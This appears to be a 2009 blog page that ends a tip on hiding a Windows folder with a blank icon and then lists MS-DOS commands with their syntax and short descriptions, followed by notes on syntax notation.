Right click on the folder whose name you made invisible. Go to Properties, then go to the Customize tab. Then click on the Change Icon button. Select any blank icon there. Remember there will be many blank icons (see snapshot). Just choose any one.Click OK.









your folder is invisible now (without any software). Now only you know where the folder is located. Enjoy.

Sunday, May 24, 2009

DOS Command Index Information about all current DOS commands

APPEND

(External)

APPEND ;
APPEND [d:]path[;][d:]path[...]
APPEND [/X:on|off][/path:on|off] [/E]

Displays or sets the search path for data files. DOS will search the specified path(s) if the file is not found in the current path.


ASSIGN

(External)

ASSIGN x=y [...] /sta

Redirects disk drive requests to a different drive.


ATTRIB

(External)

ATTRIB [d:][path]filename [/S]
ATTRIB [+R|-R] [+A|-A] [+S|-S] [+H|-H] [d:][path]filename [/S]

Sets or displays the read-only, archive, system, and hidden attributes of a file or directory.


BACKUP

(External)

BACKUP d:[path][filename] d:[/S][/M][/A][/F:(size)] [/P][/D:date] [/T:time] [/L:[path]filename]

Makes a backup copy of one or more files. (In DOS Version 6, this program is stored on the DOS supplemental disk.)


BREAK

(Internal)

BREAK =on|off

Used from the DOS prompt or in a batch file or in the CONFIG.SYS file to set (or display) whether or not DOS should check for a Ctrl + Break key combination.


BUFFERS

(Internal)

BUFFERS=(number),(read-ahead number)

Used in the CONFIG.SYS file to set the number of disk buffers (number) that will be available for use during data input. Also used to set a value for the number of sectors to be read in advance (read-ahead) during data input operations.


CALL

(Internal)

CALL [d:][path]batchfilename [options]

Calls another batch file and then returns to current batch file to continue.


CHCP

(Internal)

CHCP (codepage)

Displays the current code page or changes the code page that DOS will use.


CHDIR

(Internal)

CHDIR (CD) [d:]path
CHDIR (CD)[..]

Displays working (current) directory and/or changes to a different directory.


CHKDSK

(External)

CHKDSK [d:][path][filename] [/F][/V]

Checks a disk and provides a file and memory status report.


CHOICE

(Internal)

CHOICE [/C[:]keys] [/N][/S][/T[:]c,nn] [text]

Used to provide a prompt so that a user can make a choice while a batch program is running.


CLS (Clear Screen)

(Internal)

CLS

Clears (erases) the screen.


COMMAND

(External)

COMMAND [d:][path] [device] [/P][/E:(size)] [/MSG][/Y [/C (command)|/K (command)]

Starts a new version of the DOS command processor (the program that loads the DOS Internal programs).


COMP

(External)

COMP [d:][path][filename] [d:][path][filename] [/A][/C][/D][/L][/N:(number)]

Compares two groups of files to find information that does not match. (See FC command).


COPY

(Internal)

COPY [/Y|-Y] [/A][/B] [d:][path]filename [/A][/B] [d:][path][filename] [/V]
or
COPY [/Y|-Y][/A][/B] [d:][path]filename+[d:][path]filename[...][d:][path][filename] [/V]

Copies and appends files.


COUNTRY

(Internal)

COUNTRY=country code,[code page][,][d:][filename]

Used in the CONFIG.SYS file to tell DOS to use country-specific text conventions during processing.


CTTY

(Internal)

CTTY (device)

Changes the standard I/O (Input/Output) device to an auxiliary device.


DATE

(Internal)

DATE mm-dd-yy

Displays and/or sets the system date.


DBLSPACE

(External)

DBLSPACE / automount=drives
DBLSPACE /chkdsk [/F] [d:]
DBLSPACE /compress d: [/newdrive=host:] [/reserve=size] [/F]
DBLSPACE /create d: [/newdrive=host:] [/reserve=size] [/size=size]
DBLSPACE /defragment [d:] ]/F]
DBLSPACE /delete d:
DBLSPACE /doubleguard=0|1
DBLSPACE /format d:
DBLSPACE [/info] [d:]
DBLSPACE /list
DBLSPACE /mount[=nnn] host: [/newdrive=d:]
DBLSPACE /ratio[=ratio] [d:] [/all]
DBLSPACE /size[=size] [/reserve=size] d:
DBLSPACE /uncompress d:
DBLSPACE /unmount [d:]

A program available with DOS 6.0 that allows you to compress information on a disk.


DEBUG

(External)

DEBUG [pathname] [parameters]

An MS-DOS utility used to test and edit programs.


DEFRAG

(External)

DEFRAG [d:] [/F][/S[:]order] [/B][/skiphigh [/LCD|/BW|/GO] [/H]
DEFRAG [d:] [/V][/B][/skiphigh] [/LCD]|/BW|/GO] [/H]

Optimizes disk performance by reorganizing the files on the disk.


DEL (ERASE)

(Internal)

DEL (ERASE) [d:][path]filename [/P]

Deletes (erases) files from disk.


DELOLDOS

(External)

DELOLDOS [/B]

Deletes all files from previous versions of DOS after a 5.0 or 6.0 installation.


DELTREE

(External)

DELTREE [/Y] [d:]path [d:]path[...]

Deletes (erases) a directory including all files and subdirectories that are in it.


DEVICE

(Internal)

DEVICE=(driver name)

Used in the CONFIG.SYS file to tell DOS which device driver to load.


DEVICEHIGH

(Internal)

DEVICEHIGH=(driver name)

Like DEVICE, DEVICEHIGH is used in the CONFIG.SYS file to tell DOS which device driver software to use for devices; however, this option is used to install the device driver into the upper memory area.


DIR

(Internal)

DIR [d:][path][filename] [/A:(attributes)] [/O:(order)] [/B][/C][/CH][/L][/S][/P][/W]

Displays directory of files and directories stored on disk.


DISKCOMP

(External)

DISKCOMP [d:] [d:][/1][/8]

Compares the contents of two diskettes.


DISKCOPY

(External)

DISKCOPY [d:] [d:][/1][/V][/M]

Makes an exact copy of a diskette.


DOS

(Internal)

DOS=[high|low],[umb|noumb]

Used in the CONFIG.SYS file to specify the memory location for DOS. It is used to load DOS into the upper memory area and to specify whether or not the upper memory blocks will be used.


DOSKEY

(External)

DOSKEY [reinstall] [/bufsize=size][/macros][/history][/insert|/overstrike] [macroname=[text]]

Loads the Doskey program into memory which can be used to recall DOS commands so that you can edit them.


DOSSHELL

(External)

DOSSHELL [/B] [/G:[resolution][n]]|[/T:[resolution][n]]

Initiates the graphic shell program using the specified screen resolution.


DRIVPARM

(Internal)

DRIVPARM= /D:(number) [/C] [/F:(form factor)] [/H:(number)] [/I][ /N][/S:(number)] [/T:(tracks)]

Used in the CONFIG.SYS file to set parameters for a disk drive.


ECHO

(Internal)

ECHO on|off
ECHO (message)

Displays messages or turns on or off the display of commands in a batch file.


EDIT

(External)

EDIT [d:][path]filename [/B][/G][/H][/NOHI]

Starts the MS-DOS editor, a text editor used to create and edit ASCII text files.


EMM386

(External)

EMM386 [on|off|auto] [w=on|off]

Enables or disables EMM386 expanded-memory support on a computer with an 80386 or higher processor.


EXE2BIN

(External)

EXE2BIN [d:][path]filename [d:][path]filename

Converts .EXE (executable) files to binary format.


EXIT

(Internal)

EXIT

Exits a secondary command processor.


EXPAND

(External)

EXPAND [d:][path]filename [[d:][path]filename[ . . .]]

Expands a compressed file.


FASTHELP

(External)

FASTHELP [command][command] /?

Displays a list of DOS commands with a brief explanation of each.


FASTOPEN

(External)

FASTOPEN d:[=n][/X]

Keeps track of the locations of files for fast access.


FC

(External)

FC [/A][/C][/L][/Lb n][/N][/T][/W][number] [d:][path]filename [d:][path]filename

or (for binary comparisons)
FC [/B][/number] [d:][path]filename [d:][path]filename

Displays the differences between two files or sets of files.


FCBS

(Internal)

FCBS=(number)

Used in the CONFIG.SYS file to specify the number of file-control blocks for file sharing.


FDISK

(External)

FDISK [/status]

Prepares a fixed disk to accept DOS files for storage.


FILES

(Internal)

FILES=(number)

Used in the CONFIG.Sys file to specify the maximum number of files that can be open at the same time.


FIND

(External)

FIND [/V][/C][/I][/N] ÒstringÓ [d:][path]filename[...]

Finds and reports the location of a specific string of text characters in one or more files.


FOR

(Internal)

FOR %%(variable) IN (set) DO (command)

or (for interactive processing)
FOR %(variable) IN (set) DO (command)

Performs repeated execution of commands (for both batch processing and interactive processing).


FORMAT

(External)

FORMAT d:[/1][/4][/8][/F:(size)] [/N:(sectors)] [/T:(tracks)][/B|/S][/C][/V:(label)] [/Q][/U][/V]

Formats a disk to accept DOS files.


GOTO

(Internal)

GOTO (label)

Causes unconditional branch to the specified label.


GRAFTABL

(External)

GRAFTABL [(code page)]
GRAFTABL [status]

Loads a table of character data into memory (for use with a color/graphics adapter).


GRAPHICS

(External)

GRAPHICS [printer type][profile] [/B][/R][/LCD][/PB:(id)] [/C][/F][/P(port)]

Provides a way to print contents of a graphics screen display.


HELP

(External)

HELP [command] [/B][/G][/H][/NOHI]

Displays information about a DOS command.


IF

(Internal)

IF [NOT] EXIST filename (command) [parameters]
IF [NOT] (string1)==(string2) (command) [parameters]
IF [NOT] ERRORLEVEL (number) (command) [parameters]

Allows for conditional operations in batch processing.


INCLUDE

(Internal)

INCLUDE= blockname

Used in the CONFIG.SYS file to allow you to use the commands from one CONFIG.SYS block within another.


INSTALL

(Internal)

INSTALL=[d: ][\path]filename [parameters]

Used in the CONFIG.SYS file to load memory-resident programs into conventional memory.


INTERLINK

(External)

INTERLINK [client[:]=[server][:]]

Connects two computers via parallel or serial ports so that the computers can share disks and printer ports.


INTERSVR

(External)

INTERSVR [d:][...][/X=d:][...] [/LPT:[n|address]] [/COM:[n|address]][/baud:rate] [/B][/V]
INTERSVR /RCOPY

Starts the Interlink server.


JOIN

(External)

JOIN d: [d:path]
JOIN d: [/D]

Allows access to the directory structure and files of a drive through a directory on a different drive.


KEYB

(External)

KEYB [xx][,][yyy][,][d:][path]filename [/E][/ID:(number)]

Loads a program that replaces the support program for U. S. keyboards.

LABEL

(External)

LABEL [d:][volume label]

Creates or changes or deletes a volume label for a disk.

LASTDRIVE

(Internal)

LASTDRIVE=(drive letter)

Used in the CONFIG.SYS file to set the maximum number of drives that can be accessed.

LOADFIX

(Internal)

LOADFIX [d:][path]filename [parameters]

Ensures that a program is loaded above the first 64K of conventional memory, and runs the program.

LOADHIGH

(Internal)

LOADHIGH (LH) [d:][path]filename [parameters]

Loads memory resident application into reserved area of memory (between 640K-1M).


MEM

(External)

MEM [/program|/debug|/classify|/free|/module(name)] [/page]

Displays amount of installed and available memory, including extended, expanded, and upper memory.


MEMMAKER

(External)

MEMMAKER [/B][/batch][/session][/swap:d] [/T][/undo][/W:size1,size2]

Starts the MemMaker program, a program that lets you optimize your computer's memory.


MENUCOLOR

(Internal)

MENUCOLOR=textcolor,[background]

Used in the CONFIG.SYS file to set the colors that will be used by DOS to display text on the screen.


MENUDEFAULT

(Internal)

MENUDEFAULT=blockname, [timeout]

Used in the CONFIG.SYS file to set the startup configuration that will be used by DOS if no key is pressed within the specified timeout period.


MENUITEM

(Internal)

MENUITEM=blockname, [menutext]

Used in the CONFIG.SYS file to create a start-up menu from which you can select a group of CONFIG.SYS commands to be processed upon reboot.


MIRROR

(External)

MIRROR [d:]path [d:] path [...]
MIRROR [d1:][d2:][...] [/T(drive)(files)] [/partn][/U][/1]

Saves disk storage information that can be used to recover accidentally erased files.


MKDIR

(MD) (Internal)

MKDIR (MD) [d:]path

Creates a new subdirectory.



MODE

(External)

MODE n
MODE LPT#[:][n][,][m][,][P][retry]
MODE [n],m[,T]
MODE (displaytype,linetotal)
MODE COMn[:]baud[,][parity][,][databits][,][stopbits][,][retry]
MODE LPT#[:]=COMn [retry]
MODE CON[RATE=(number)][DELAY=(number)]
MODE (device) CODEPAGE PREPARE=(codepage) [d:][path]filename
MODE (device) CODEPAGE PREPARE=(codepage list) [d:][path]filename
MODE (device) CODEPAGE SELECT=(codepage)
MODE (device) CODEPAGE [/STATUS]
MODE (device) CODEPAGE REFRESH

Sets mode of operation for devices or communications.


MORE

(External)

MORE < (filename or command)
(name)|MORE

Sends output to console, one screen at a time.



MOVE

(Internal)

MOVE [/Y|/-Y] [d:][path]filename[,[d:][path]filename[...]] destination

Moves one or more files to the location you specify. Can also be used to rename directories.



MSAV

(External)

MSAV [d:] [/S|/C][/R][/A][/L][/N][/P][/F][/video][/mouse]
MSAV /video

Scans your computer for known viruses.



MSBACKUP

(External)

MSBACKUP [setupfile] [/BW|/LCD|/MDA]

Used to backup or restore one or more files from one disk to another.



MSCDEX

(External)

MSCDEX /D:driver [/D:driver2. . .] [/E][/K][/S][/V][/L:letter] [/M:number]

Used to gain access to CD-ROM drives (new with DOS Version 6).



MSD

(External)

MSD [/B][/I]
MSD [/I] [/F[d:][path]filename [/P[d:][path]filename [/S[d:][path]filename

Provides detailed technical information about your computer.



NLSFUNC

(External)

NLSFUNC [d:][path]filename

Used to load a file with country-specific information.



NUMLOCK

(Internal)

NUMLOCK=on|off

Used in the CONFIG.SYS file to specify the state of the NumLock key.



PATH

(Internal)

PATH;
PATH [d:]path[;][d:]path[...]

Sets or displays directories that will be searched for programs not in the current directory.



PAUSE

(Internal)

PAUSE [comment]

Suspends execution of a batch file until a key is pressed.



POWER

(External)

POWER [adv:max|reg|min]|std|off]

Used to turn power management on and off, report the status of power management, and set levels of power conservation.



PRINT

(External)

PRINT [/B:(buffersize)] [/D:(device)] [/M:(maxtick)] [/Q:(value] [/S:(timeslice)][/U:(busytick)] [/C][/P][/T] [d:][path][filename] [...]

Queues and prints data files.



PROMPT

(Internal)

PROMPT [prompt text] [options]

Changes the DOS command prompt.



RECOVER

(External)

RECOVER [d:][path]filename
RECOVER d:

Resolves sector problems on a file or a disk. (Beginning with DOS Version 6, RECOVER is no longer available ).



REM

(Internal)

REM [comment]

Used in batch files and in the CONFIG.SYS file to insert remarks (that will not be acted on).



RENAME (REN)

(Internal)

RENAME (REN) [d:][path]filename [d:][path]filename

Changes the filename under which a file is stored.



REPLACE

(External)

REPLACE [d:][path]filename [d:][path] [/A][/P][/R][/S][/U][/W]

Replaces stored files with files of the same name from a different storage location.



RESTORE

(External)

RESTORE d: [d:][path]filename [/P][/S][/B:mm-dd-yy] [/A:mm-dd-yy][/E:hh:mm:ss] [/L:hh:mm:ss] [/M][/N][/D]

Restores to standard disk storage format files previously stored using the BACKUP command.



RMDIR (RD)

(Internal)

RMDIR (RD) [d:]path

Removes a subdirectory.



SCANDISK

(External)

SCANDISK [d: [d: . . .]|/all][/checkonly|/autofix[/nosave]|/custom][/surface][/mono][/nosummay]
SCANDISK volume-name[/checkonly|/autofix[/nosave]|/custom][/mono][/nosummary]
SCANDISK /fragment [d:][path]filename
SCANDISK /undo [undo-d:][/mono]

Starts the Microsoft ScanDisk program which is a disk analysis and repair tool used to check a drive for errors and correct any problems that it finds.



SELECT

(External)

SELECT [d:] [d:][path] [country code][keyboard code]

Formats a disk and installs country-specific information and keyboard codes (starting with DOS Version 6, this command is no longer available).



SET

(Internal)

SET (string1)=(string2)

Inserts strings into the command environment. The set values can be used later by programs.


SETVER

(External)

SETVER [d:]:path][filename (number)][/delete][/quiet]

Displays the version table and sets the version of DOS that is reported to programs.



SHARE

(External)

SHARE [/F:space] [/L:locks]

Installs support for file sharing and file locking.



SHELL

(Internal)

SHELL=[d:][path]filename [parameters]

Used in the CONFIG.SYS file to specify the command interpreter that DOS should use.



SHIFT

(Internal)

SHIFT

Increases number of replaceable parameters to more than the standard ten for use in batch files.



SORT

(External)

SORT [/R][/+n] < (filename)
SORT [/R][/+n] > (filename2)

Sorts input and sends it to the screen or to a file.



STACKS

(Internal)

STACKS=(number),(size)

Used in the CONFIG.SYS file to set the number of stack frames and the size of each stack frame.



SUBMENU

(Internal)

SUBMENU=blockname, [menutext]

Used in the CONFIG.SYS file to create a multilevel menu from which you can select start-up options.



SUBST

(External)

SUBST d: d:path
SUBST d: /D

Substitutes a virtual drive letter for a path designation.



SWITCHES

(Internal)

SWITCHES= [/K][/F][/N][/W]

Used in the CONFIG.SYS file to configure DOS in a special way; for example, to tell DOS to emulate different hardware configurations.



SYS

(External)

SYS [source] d:

Transfers the operating system files to another disk.



TIME

(Internal)

TIME hh:mm[:ss][.cc][A|P]

Displays current time setting of system clock and provides a way for you to reset the time.



TREE

(External)

TREE [d:][path] [/A][/F]

Displays directory paths and (optionally) files in each subdirectory.



TYPE

(Internal)

TYPE [d:][path]filename

Displays the contents of a file.



UNDELETE

(External)

UNDELETE [d:][path][filename] [/DT|/DS|/DOS]
UNDELETE [/list|/all|/purge[d:]|/status|/load|/U|/S[d:]|/Td:[-entries]]

Restores files deleted with the DELETE command.



UNFORMAT

(External)

UNFORMAT d: [/J][/L][/test][/partn][/P][/U]

Used to undo the effects of formatting a disk.



VER

(Internal)

VER

Displays the DOS version number.



VERIFY

(Internal)

VERIFY on|off

Turns on the verify mode; the program checks all copying operations to assure that files are copied correctly.



VOL

(Internal)

VOL [d:]

Displays a disk's volume label.



VSAFE

(External)

VSAFE [/option[+|-]...] [/NE][/NX][Ax|/Cx] [/N][/D][/U]

VSAFE is a memory-resident program that continuously monitors your computer for viruses and displays a warning when it finds one.



XCOPY

(External)

XCOPY [d:][path]filename [d:][path][filename] [/A][/D:(date)] [/E][/M][/P][/S][/V][/W][Y\-Y]
Copies directories, subdirectories, and files.



Syntax Notes


To be functional, each DOS command must be entered in a particular way: this command entry structure is known as the command's "syntax." The syntax "notation" is a way to reproduce the command syntax in print.

For example, you can determine the items that are optional, by looking for information that is printed inside square brackets. The notation [d:], for example, indicates an optional drive designation. The command syntax, on the other hand, is how YOU enter the command to make it work.


Command Syntax Elements

1. Command Name

The DOS command name is the name you enter to start the DOS program (a few of the DOS commands can be entered using shortcut names). The DOS command name is always entered first. In this book, the command is usually printed in uppercase letters, but you can enter command names as either lowercase or uppercase or a mix of both.

2. Space

Always leave a space after the command name.

3. Drive Designation

The drive designation (abbreviated in this book as "d:") is an option for many DOS commands. However, some commands are not related to disk drives and therefore do not require a drive designation. Whenever you enter a DOS command that deals with disk drives and you are already working in the drive in question, you do not have to enter the drive designator. For example, if you are working in drive A (when the DOS prompt A> is showing at the left side of the screen) and you want to use the DIR command to display a directory listing of that same drive, you do not have to enter the drive designation. If you do not enter a drive designation, DOS always assumes you are referring to the drive you are currently working in (sometimes called the "default" drive).

4. A Colon

When referring to a drive in a DOS command, you must always follow the drive designator with a colon (:) (this is how DOS recognizes it as a drive designation).

5. Pathname

A pathname (path) refers to the path you want DOS to follow in order to act on the DOS command. As described in Chapter 3, it indicates the path from the current directory or subdirectory to the files that are to be acted upon.

6. Filename

A filename is the name of a file stored on disk. As described in Chapter 1, a filename can be of eight or fewer letters or other legal characters.

7. Filename Extension

A filename extension can follow the filename to further identify it. The extension follows a period and can be of three or fewer characters. A filename extension is not required.

8. Switches

Characters shown in a command syntax that are represented by a letter or number and preceded by a forward slash (for example, "/P") are command options (sometimes known as "switches"). Use of these options activate special operations as part of a DOS command's functions.

9. Brackets

Items enclosed in square brackets are optional; in other words, the command will work in its basic form without entering the information contained inside the brackets.

10. Ellipses

Ellipses (...) indicate that an item in a command syntax can be repeated as many times as needed.

11. Vertical Bar

When items are separated by a vertical bar (|), it means that you enter one of the separated items. For example: ON | OFF means that you can enter either ON or OFF, but not both